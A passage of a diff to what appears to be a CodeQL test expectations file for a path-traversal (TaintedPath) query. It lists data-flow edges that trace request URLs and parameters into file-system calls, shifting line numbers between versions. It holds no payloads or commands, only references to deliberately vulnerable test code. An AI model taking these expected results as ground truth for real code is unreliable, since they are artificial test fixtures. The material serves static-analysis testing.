, path) | provenance | Config | -| TaintedPath.js:54:49:54:52 | path | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | provenance | Config | -| TaintedPath.js:56:48:56:51 | path | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:58:54:58:57 | path | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:60:57:60:60 | path | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | provenance | Config | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | TaintedPath.js:65:31:65:76 | require ... ).query | provenance | Config | -| TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:70 | require ... eq.url) | provenance | Config | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | TaintedPath.js:66:31:66:74 | require ... ).query | provenance | Config | -| TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:68 | require ... eq.url) | provenance | Config | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | TaintedPath.js:67:31:67:73 | require ... ).query | provenance | Config | -| TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:67 | require ... eq.url) | provenance | Config | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:86:44:86:47 | path | provenance | | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:87:14:87:17 | path | provenance | | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | TaintedPath.js:84:13:84:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | TaintedPath.js:84:13:84:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | TaintedPath.js:84:6:84:47 | path | provenance | | -| TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:84:13:84:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:86:44:86:47 | path | TaintedPath.js:86:28:86:48 | fs.real ... 
c(path) | provenance | Config | -| TaintedPath.js:87:14:87:17 | path | TaintedPath.js:88:32:88:39 | realpath | provenance | Config | -| TaintedPath.js:88:32:88:39 | realpath | TaintedPath.js:89:45:89:52 | realpath | provenance | | -| TaintedPath.js:120:6:120:47 | path | TaintedPath.js:122:23:122:26 | path | provenance | | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | TaintedPath.js:120:13:120:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | TaintedPath.js:120:13:120:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | TaintedPath.js:120:6:120:47 | path | provenance | | -| TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:120:13:120:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:128:19:128:22 | path | provenance | | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:130:15:130:18 | path | provenance | | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | TaintedPath.js:126:14:126:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | TaintedPath.js:126:14:126:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | TaintedPath.js:126:7:126:48 | path | provenance | | -| TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:126:14:126:37 | url.par ... 
, true) | provenance | Config | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:132:19:132:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:136:19:136:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:137:28:137:32 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:139:33:139:37 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:142:20:142:24 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:145:19:145:23 | split | provenance | | -| TaintedPath.js:130:15:130:18 | path | TaintedPath.js:130:15:130:29 | path.split("/") | provenance | Config | -| TaintedPath.js:130:15:130:29 | path.split("/") | TaintedPath.js:130:7:130:29 | split | provenance | | -| TaintedPath.js:132:19:132:23 | split | TaintedPath.js:132:19:132:33 | split.join("/") | provenance | Config | -| TaintedPath.js:136:19:136:23 | split | TaintedPath.js:136:19:136:26 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:32 | split | TaintedPath.js:137:28:137:35 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:35 | split[x] | TaintedPath.js:137:19:137:35 | prefix + split[x] | provenance | Config | -| TaintedPath.js:139:7:139:38 | concatted | TaintedPath.js:140:19:140:27 | concatted | provenance | | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | TaintedPath.js:139:7:139:38 | concatted | provenance | | -| TaintedPath.js:139:33:139:37 | split | TaintedPath.js:139:19:139:38 | prefix.concat(split) | provenance | Config | -| TaintedPath.js:140:19:140:27 | concatted | TaintedPath.js:140:19:140:37 | concatted.join("/") | provenance | Config | -| TaintedPath.js:142:7:142:39 | concatted2 | TaintedPath.js:143:19:143:28 | concatted2 | provenance | | -| TaintedPath.js:142:20:142:24 | split | TaintedPath.js:142:20:142:39 | split.concat(prefix) | provenance | Config | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | 
TaintedPath.js:142:7:142:39 | concatted2 | provenance | | -| TaintedPath.js:143:19:143:28 | concatted2 | TaintedPath.js:143:19:143:38 | concatted2.join("/") | provenance | Config | -| TaintedPath.js:145:19:145:23 | split | TaintedPath.js:145:19:145:29 | split.pop() | provenance | Config | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:154:29:154:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:160:29:160:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:161:29:161:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:162:29:162:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:163:29:163:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:178:40:178:43 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:179:50:179:53 | path | provenance | | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | TaintedPath.js:150:14:150:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | TaintedPath.js:150:14:150:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | TaintedPath.js:150:7:150:48 | path | provenance | | -| TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:150:14:150:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:154:29:154:32 | path | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:160:29:160:32 | path | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:161:29:161:32 | path | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:162:29:162:32 | path | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:163:29:163:32 | path | TaintedPath.js:163:29:163:57 | path.re ... 
/g, '') | provenance | Config | -| TaintedPath.js:178:40:178:43 | path | TaintedPath.js:178:40:178:73 | path.re ... +/, '') | provenance | Config | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | provenance | Config | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | provenance | Config | -| TaintedPath.js:179:50:179:53 | path | TaintedPath.js:179:29:179:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | provenance | Config | -| TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:45 | qs.parse(req.url) | provenance | Config | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | provenance | Config | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | provenance | Config | -| TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:38:188:58 | normali ... eq.url) | provenance | Config | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | provenance | Config | -| TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | provenance | Config | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:196:31:196:34 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:197:45:197:48 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:198:35:198:38 | path | provenance | | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | TaintedPath.js:195:14:195:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | TaintedPath.js:195:14:195:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:195:14:195:48 | url.par ... 
ry.path | TaintedPath.js:195:7:195:48 | path | provenance | | -| TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:195:14:195:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:202:7:202:48 | path | TaintedPath.js:206:29:206:32 | path | provenance | | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | TaintedPath.js:202:14:202:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | TaintedPath.js:202:14:202:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | TaintedPath.js:202:7:202:48 | path | provenance | | -| TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:202:14:202:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:206:29:206:32 | path | TaintedPath.js:206:29:206:85 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:213:29:213:32 | path | provenance | | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:216:31:216:34 | path | provenance | | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | TaintedPath.js:211:14:211:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | TaintedPath.js:211:14:211:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | TaintedPath.js:211:7:211:48 | path | provenance | | -| TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:211:14:211:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:213:29:213:32 | path | TaintedPath.js:213:29:213:68 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:216:31:216:34 | path | TaintedPath.js:216:31:216:69 | path.re ... 
'), '') | provenance | Config | -| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:11:36:11:43 | filePath | provenance | | +| TaintedPath.js:13:45:13:48 | path | TaintedPath.js:13:29:13:48 | "/home/user/" + path | provenance | Config | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:39:48:39:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:42:45:42:48 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:43:51:43:54 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:44:50:44:53 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:45:52:45:55 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:46:49:46:52 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:47:48:47:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:48:54:48:57 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:49:57:49:60 | path | provenance | | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | TaintedPath.js:36:10:36:39 | url.par ... ).query | provenance | Config | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | TaintedPath.js:36:10:36:44 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | TaintedPath.js:36:3:36:44 | path | provenance | | +| TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:36:10:36:33 | url.par ... , true) | provenance | Config | +| TaintedPath.js:39:48:39:51 | path | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:42:45:42:48 | path | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | provenance | Config | +| TaintedPath.js:43:51:43:54 | path | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:44:50:44:53 | path | TaintedPath.js:44:29:44:54 | pathMod ... 
e(path) | provenance | Config | +| TaintedPath.js:45:52:45:55 | path | TaintedPath.js:45:29:45:56 | pathMod ... , path) | provenance | Config | +| TaintedPath.js:46:49:46:52 | path | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | provenance | Config | +| TaintedPath.js:47:48:47:51 | path | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:48:54:48:57 | path | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:49:57:49:60 | path | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | provenance | Config | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | TaintedPath.js:54:31:54:76 | require ... ).query | provenance | Config | +| TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:70 | require ... eq.url) | provenance | Config | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | TaintedPath.js:55:31:55:74 | require ... ).query | provenance | Config | +| TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:68 | require ... eq.url) | provenance | Config | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | TaintedPath.js:56:31:56:73 | require ... ).query | provenance | Config | +| TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:67 | require ... eq.url) | provenance | Config | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:75:44:75:47 | path | provenance | | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:76:14:76:17 | path | provenance | | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | TaintedPath.js:73:13:73:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | TaintedPath.js:73:13:73:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | TaintedPath.js:73:6:73:47 | path | provenance | | +| TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:73:13:73:36 | url.par ... 
, true) | provenance | Config | +| TaintedPath.js:75:44:75:47 | path | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | provenance | Config | +| TaintedPath.js:76:14:76:17 | path | TaintedPath.js:77:32:77:39 | realpath | provenance | Config | +| TaintedPath.js:77:32:77:39 | realpath | TaintedPath.js:78:45:78:52 | realpath | provenance | | +| TaintedPath.js:109:6:109:47 | path | TaintedPath.js:111:23:111:26 | path | provenance | | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | TaintedPath.js:109:13:109:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | TaintedPath.js:109:13:109:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | TaintedPath.js:109:6:109:47 | path | provenance | | +| TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:109:13:109:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:117:19:117:22 | path | provenance | | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:119:15:119:18 | path | provenance | | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | TaintedPath.js:115:14:115:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | TaintedPath.js:115:14:115:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | TaintedPath.js:115:7:115:48 | path | provenance | | +| TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:115:14:115:37 | url.par ... 
, true) | provenance | Config | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:121:19:121:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:125:19:125:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:126:28:126:32 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:128:33:128:37 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:131:20:131:24 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:134:19:134:23 | split | provenance | | +| TaintedPath.js:119:15:119:18 | path | TaintedPath.js:119:15:119:29 | path.split("/") | provenance | Config | +| TaintedPath.js:119:15:119:29 | path.split("/") | TaintedPath.js:119:7:119:29 | split | provenance | | +| TaintedPath.js:121:19:121:23 | split | TaintedPath.js:121:19:121:33 | split.join("/") | provenance | Config | +| TaintedPath.js:125:19:125:23 | split | TaintedPath.js:125:19:125:26 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:32 | split | TaintedPath.js:126:28:126:35 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:35 | split[x] | TaintedPath.js:126:19:126:35 | prefix + split[x] | provenance | Config | +| TaintedPath.js:128:7:128:38 | concatted | TaintedPath.js:129:19:129:27 | concatted | provenance | | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | TaintedPath.js:128:7:128:38 | concatted | provenance | | +| TaintedPath.js:128:33:128:37 | split | TaintedPath.js:128:19:128:38 | prefix.concat(split) | provenance | Config | +| TaintedPath.js:129:19:129:27 | concatted | TaintedPath.js:129:19:129:37 | concatted.join("/") | provenance | Config | +| TaintedPath.js:131:7:131:39 | concatted2 | TaintedPath.js:132:19:132:28 | concatted2 | provenance | | +| TaintedPath.js:131:20:131:24 | split | TaintedPath.js:131:20:131:39 | split.concat(prefix) | provenance | Config | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | 
TaintedPath.js:131:7:131:39 | concatted2 | provenance | | +| TaintedPath.js:132:19:132:28 | concatted2 | TaintedPath.js:132:19:132:38 | concatted2.join("/") | provenance | Config | +| TaintedPath.js:134:19:134:23 | split | TaintedPath.js:134:19:134:29 | split.pop() | provenance | Config | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:143:29:143:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:149:29:149:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:150:29:150:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:151:29:151:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:152:29:152:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:167:40:167:43 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:168:50:168:53 | path | provenance | | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | TaintedPath.js:139:14:139:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | TaintedPath.js:139:14:139:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | TaintedPath.js:139:7:139:48 | path | provenance | | +| TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:139:14:139:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:143:29:143:32 | path | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:149:29:149:32 | path | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:150:29:150:32 | path | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:151:29:151:32 | path | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:152:29:152:32 | path | TaintedPath.js:152:29:152:57 | path.re ... 
/g, '') | provenance | Config | +| TaintedPath.js:167:40:167:43 | path | TaintedPath.js:167:40:167:73 | path.re ... +/, '') | provenance | Config | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | provenance | Config | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | provenance | Config | +| TaintedPath.js:168:50:168:53 | path | TaintedPath.js:168:29:168:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | provenance | Config | +| TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:45 | qs.parse(req.url) | provenance | Config | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | provenance | Config | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | provenance | Config | +| TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:38:177:58 | normali ... eq.url) | provenance | Config | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | provenance | Config | +| TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | provenance | Config | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:185:31:185:34 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:186:45:186:48 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:187:35:187:38 | path | provenance | | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | TaintedPath.js:184:14:184:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | TaintedPath.js:184:14:184:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:184:14:184:48 | url.par ... 
ry.path | TaintedPath.js:184:7:184:48 | path | provenance | | +| TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:184:14:184:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:191:7:191:48 | path | TaintedPath.js:195:29:195:32 | path | provenance | | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | TaintedPath.js:191:14:191:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | TaintedPath.js:191:14:191:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | TaintedPath.js:191:7:191:48 | path | provenance | | +| TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:191:14:191:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:195:29:195:32 | path | TaintedPath.js:195:29:195:85 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:202:29:202:32 | path | provenance | | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:205:31:205:34 | path | provenance | | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | TaintedPath.js:200:14:200:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | TaintedPath.js:200:14:200:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | TaintedPath.js:200:7:200:48 | path | provenance | | +| TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:200:14:200:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:202:29:202:32 | path | TaintedPath.js:202:29:202:68 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:205:31:205:34 | path | TaintedPath.js:205:31:205:69 | path.re ... '), '') | provenance | Config | +| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:10:36:10:43 | filePath | provenance | | | examples/TaintedPath.js:8:18:8:41 | url.par ... 
, true) | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | provenance | Config | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | provenance | Config | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | examples/TaintedPath.js:8:7:8:52 | filePath | provenance | | | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | provenance | Config | -| examples/TaintedPath.js:11:36:11:43 | filePath | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | provenance | Config | +| examples/TaintedPath.js:10:36:10:43 | filePath | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | provenance | Config | | handlebars.js:10:51:10:58 | filePath | handlebars.js:11:32:11:39 | filePath | provenance | | | handlebars.js:13:73:13:80 | filePath | handlebars.js:15:25:15:32 | filePath | provenance | | | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:10:51:10:58 | filePath | provenance | | 
@@ -899,10 +899,10 @@ edges | tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | tainted-promise-steps.js:11:19:11:35 | await pathPromise | provenance | | | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | tainted-promise-steps.js:12:20:12:23 | path | provenance | | | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | -| tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | provenance | Config | -| tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | +| tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | 
@@ -944,69 +944,69 @@ edges | torrents.js:6:6:6:45 | loc | torrents.js:7:25:7:27 | loc | provenance | | | torrents.js:6:12:6:45 | dir + " ... t.data" | torrents.js:6:6:6:45 | loc | provenance | | | torrents.js:6:24:6:27 | name | torrents.js:6:12:6:45 | dir + " ... t.data" | provenance | Config | -| typescript.ts:9:7:9:48 | path | typescript.ts:12:29:12:32 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:20:15:20:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:23:15:23:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:30:15:30:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:11:29:11:32 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:19:15:19:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:22:15:22:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:29:15:29:18 | path | provenance | | | typescript.ts:9:14:9:37 | url.par ... , true) | typescript.ts:9:14:9:43 | url.par ... ).query | provenance | Config | | typescript.ts:9:14:9:43 | url.par ... ).query | typescript.ts:9:14:9:48 | url.par ... ry.path | provenance | Config | | typescript.ts:9:14:9:48 | url.par ... ry.path | typescript.ts:9:7:9:48 | path | provenance | | | typescript.ts:9:24:9:30 | req.url | typescript.ts:9:14:9:37 | url.par ... 
, true) | provenance | Config | -| typescript.ts:20:7:20:18 | path3 | typescript.ts:21:39:21:43 | path3 | provenance | | -| typescript.ts:20:15:20:18 | path | typescript.ts:20:7:20:18 | path3 | provenance | | -| typescript.ts:23:7:23:18 | path4 | typescript.ts:24:39:24:43 | path4 | provenance | | -| typescript.ts:23:15:23:18 | path | typescript.ts:23:7:23:18 | path4 | provenance | | -| typescript.ts:30:7:30:18 | path6 | typescript.ts:32:29:32:33 | path6 | provenance | | -| typescript.ts:30:15:30:18 | path | typescript.ts:30:7:30:18 | path6 | provenance | | +| typescript.ts:19:7:19:18 | path3 | typescript.ts:20:39:20:43 | path3 | provenance | | +| typescript.ts:19:15:19:18 | path | typescript.ts:19:7:19:18 | path3 | provenance | | +| typescript.ts:22:7:22:18 | path4 | typescript.ts:23:39:23:43 | path4 | provenance | | +| typescript.ts:22:15:22:18 | path | typescript.ts:22:7:22:18 | path4 | provenance | | +| typescript.ts:29:7:29:18 | path6 | typescript.ts:31:29:31:33 | path6 | provenance | | +| typescript.ts:29:15:29:18 | path | typescript.ts:29:7:29:18 | path6 | provenance | | subpaths #select -| 